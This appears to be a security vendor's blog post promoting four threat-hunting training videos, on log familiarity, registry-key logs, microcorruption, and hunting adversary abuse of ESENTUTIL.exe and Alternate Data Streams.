One thing every threat hunter finds out early on is that learning to hunt ain’t easy. There is a lot of great material out there that tends to focus on theory and strategy, but a lot less that gets into the weeds of threat hunting itself. We’ve put together 4 (more) videos that we know will improve your threat hunting skills in no time flat!
Getting to Know Your Logs – Part 1
One of the most important elements of learning to threat hunt is becoming extremely familiar with logs – both in general as well as the logs specific to your organization. Lee Archinal dives deep into log data to make even novice threat hunters into seasoned log aficionados. He also shows how to make the business case for ingesting the right logs into your SIEM and big data toolsets!
Getting to Know Your Logs – Part 2
If part 1 of Getting to Know Your Logs takes first place in this list, it should be no surprise that part 2 comes in a close second! In this instalment, Lee rolls up his sleeves and examines a controversial log source: Registry Keys. The general rule of thumb is that these logs tend to be loud and can add more noise than signal. However, they also provide some of the most critical indicators of attack, especially when it comes to things like persistence. Follow along with Lee while he shows you the right way to use registry keys to your advantage.
The topic of microcorruption is often not well understood amongst defenders. The same cannot be said of adversaries, unfortunately. This is why Skyler Curtis dives into the topic to give threat hunters a better understanding of what microcorruption is, and why hunting for it is important for security teams.
Living off the Land with ESENTUTIL.exe
ESENTUTIL.exe is a powerful tool that sometimes goes unnoticed – which is exactly what adversaries want. It is designed for running tasks and operations related to databases and database files, but for threat actors this executable can abuse the NTFS file attribute Alternate Data Streams (ADS) allowing threat actors to hide files in these streams, accomplishing different goals such as tool infiltration and data exfiltration. This Living Off the Land series will introduce you to the techniques adversaries use to abuse this tool, but more importantly how to hunt for that abuse.
While learning to threat hunt often isn’t easy, we know that this collection of videos will help you become an (even better) threat hunter! If you liked this collection, you can check out our previous one here!